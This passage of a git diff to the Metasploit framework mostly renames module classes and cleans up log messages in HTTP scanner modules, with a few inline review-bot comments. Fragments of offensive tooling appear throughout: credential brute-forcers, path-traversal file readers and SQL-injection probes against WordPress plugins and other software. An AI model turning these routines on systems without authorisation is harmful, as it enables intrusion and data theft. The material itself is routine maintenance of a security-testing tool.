Logged in as '#{username}:#{password}'") + print_good("Logged in as '#{username}:#{password}'") end fname = datastore['FILENAME'] diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 53af795bcb..4f702e5cc1 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) end diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 4918004f32..580ab2f489 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 4b573346ae..d7f662fce7 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient # Scanner mixin should be near last @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]), - OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]), OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]), OptString.new('TARGETURI', [true, 'The base path', '/']) ], self.class) 
@@ -35,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary end def run - if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false - print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.") + if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES'] + print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.") else super end @@ -51,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary # If no response, quit now if res.nil? - print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No response") return end @@ -65,12 +64,12 @@ class Metasploit3 < Msf::Auxiliary server_header = val if key.downcase == 'server' end else - print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No HTTP headers") end # If the body is blank, just stop now as there is no chance of a title if res.body.nil? - print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage body") return end @@ -78,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary # there is no chance that we will have a title rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*}im.match(res.body.to_s) unless rx - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") return end 
@@ -86,13 +85,15 @@ class Metasploit3 < Msf::Auxiliary rx[:title].strip! if rx[:title] != '' rx_title = Rex::Text.html_decode(rx[:title]) - print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true - if datastore['STORE_NOTES'] == true + if datastore['SHOW_TITLES'] + print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") + end + if datastore['STORE_NOTES'] notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] } report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data) end else - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") end end diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 9a4c1e244f..314f77b7f2 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS') end def has_j_security_check? diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 6847640f9c..58e644bda0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb 
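Review bot: In modules/auxiliary/scanner/http/tomcat_enum.rb (hunk at -46,7 +46,7), `PASSWORD` and `USERNAME` are dropped from the `deregister_options` call with no explanation, so both become visible options again on a module whose visible option is a user wordlist. Whether the module or one of its mixins reads them is not visible in this hunk. A comment above the call stating why they stay registered, for example `# USERNAME and PASSWORD stay registered because ...`, would keep a later cleanup from re-adding them to the list.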
+++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/tomcat' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index c4541ac09f..1bcadbbde9 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] vprint_good("#{rhost}:#{rport} - Response - File #{file}:") res.body.each_line do |line| # the following is the last line of the useless response @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary end out = false end - elsif (res and res.code) + elsif res && res.code vprint_error("#{rhost}:#{rport} - File->#{file} not found") end end diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 86472e9648..192a7cb395 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 188088b406..ab57d7cee5 100644 
--- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index c94347a9f9..2d035a031d 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Typo3 include Msf::Auxiliary::Report @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Trying to bruteforce login") + print_status("Trying to bruteforce login") res = send_request_cgi({ 'method' => 'GET', @@ -67,10 +67,10 @@ class Metasploit3 < Msf::Auxiliary end def try_login(user, pass) - vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'") + vprint_status("Trying username:'#{user}' password: '#{pass}'") cookie = typo3_backend_login(user, pass) if cookie - print_good("#{peer} - Successful login '#{user}' password: '#{pass}'") + print_good("Successful login '#{user}' password: '#{pass}'") report_cred( ip: rhost, port: rport, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'") + vprint_error("failed to login as '#{user}' password: '#{pass}'") return end end diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 5c14785e1e..674b7dd855 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary begin sid = get_sid if sid.nil? - vprint_error("#{peer} - Failed to get sid") + vprint_error("Failed to get sid") return :abort end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => sid }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end @@ -117,9 +117,9 @@ class Metasploit3 < Msf::Auxiliary when /User name already confirmed/ return :skip_user when /Invalid password/ - vprint_status("#{peer} - Username found: #{user}") + vprint_status("Username found: #{user}") when /\/ - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.body) return :next_user end @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 48df7dd5e2..6a881c119d 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 4d0484a96a..cea5ea796e 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb 
+++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -13,7 +13,7 @@ require 'cgi' - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb index 163932d52a..399ce2cfc9 100644 --- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb +++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 9e768085ce..32f96c8d11 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 74bf30c54b..9c79ae64a4 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 42970aac95..00fab61f82 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 4fc1b55c75..489dea1a5e 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webpagetest_traversal.rb b/modules/auxiliary/scanner/http/webpagetest_traversal.rb index cb3381d0c8..4641786e14 100644 --- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb +++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index cf05c0858a..3f79cd3b9f 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") + vprint_status("Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") traversal = "..\\" * datastore['TRAVERSAL_DEPTH'] res = send_request_raw({ 
@@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded") + vprint_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index 12e6ed9e4a..34c8503a2a 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -42,7 +42,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/'), @@ -55,14 +55,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 1584fd9278..1576076911 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner @@ -49,12 +49,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless wordpress_and_online? - print_error("#{peer} - Looks like this site is no WordPress blog") + print_error("Looks like this site is no WordPress blog") return end unless wordpress_xmlrpc_enabled? - print_error("#{peer} - XMLRPC interface is not enabled") + print_error("XMLRPC interface is not enabled") return end @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? || res.code == 500 - print_good("#{peer} - vulnerable to GHOST") + print_good("vulnerable to GHOST") report_vuln( :host => ip, :proto => 'tcp', @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary :sname => datastore['SSL'] ? "https" : "http" ) else - print_status("#{peer} - target not vulnerable to GHOST") + print_status("target not vulnerable to GHOST") end end diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 2019d21f71..72acdebe94 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb index d52d6c8f69..12f8841bbe 100644 --- a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb +++ b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb 
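Review bot: In modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb (hunk at -70,7 +70,7), `if res.nil? || res.code == 500` treats a missing response the same as an HTTP 500, so a timeout, reset or filtered connection is printed as `vulnerable to GHOST` and passed to `report_vuln`. If the missing response is meant as a crash indicator, that deserves a comment, and the message should say which signal fired, e.g. `print_good("vulnerable to GHOST (#{res ? 'HTTP 500' : 'no response'})")`, so a reader of the results can weigh a possible false positive. The body of `run_host` continues outside the hunk.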
@@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_multicall' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 702d4b6bcc..32a55bdcbb 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_scanner.rb b/modules/auxiliary/scanner/http/wordpress_scanner.rb index e4c5feef18..c8249e2faf 100644 --- a/modules/auxiliary/scanner/http/wordpress_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index fb7097671a..02f774518a 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_rpc' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute 
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary return :abort end - print_status("#{peer} - Starting XML-RPC login sweep...") + print_status("Starting XML-RPC login sweep...") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 36448f4262..5284a81933 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner @@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => wordpress_url_admin_ajax, @@ -49,14 +49,14 @@ class Metasploit4 < Msf::Auxiliary } }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 507b311f36..1f8bf30ff2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index 58f70a893b..33de5081ae 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. Check the path and the traversal parameters.") + vprint_error("Nothing was downloaded. Check the path and the traversal parameters.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 6c8259c09f..800c6a897f 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress 
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary ) temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -77,9 +77,9 @@ class Metasploit3 < Msf::Auxiliary ip, res_clean ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") + print_error("Nothing was downloaded. You can try checking the POSTID parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index ca60253e0c..fce1d04daf 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -72,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index accb58a7f7..fa90614818 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb 
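Review bot: In the `@@ -57,7` hunk of wp_mobile_pack_info_disclosure.rb, `JSON.parse(res.body.gsub(...))` dereferences `res` without a nil check, and the `rescue` list (`::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError`) would not catch the resulting NoMethodError. The request that produces `res` is outside the hunk, so this is inferred: if it returns nil on a timeout, the host run ends with an unhandled exception instead of the `print_error` path. A guard such as `return unless res && res.body` before the parse keeps that failure on the handled path. The method body starts and ends outside the hunk.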
@@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -93,20 +93,20 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") traversal = "../" * datastore['DEPTH'] filename = datastore['DIRPATH'] @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.") + print_error("Nothing was downloaded. You can try to change the DIRPATH.") end end end diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 4c8334e289..b4f21db7cf 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb 
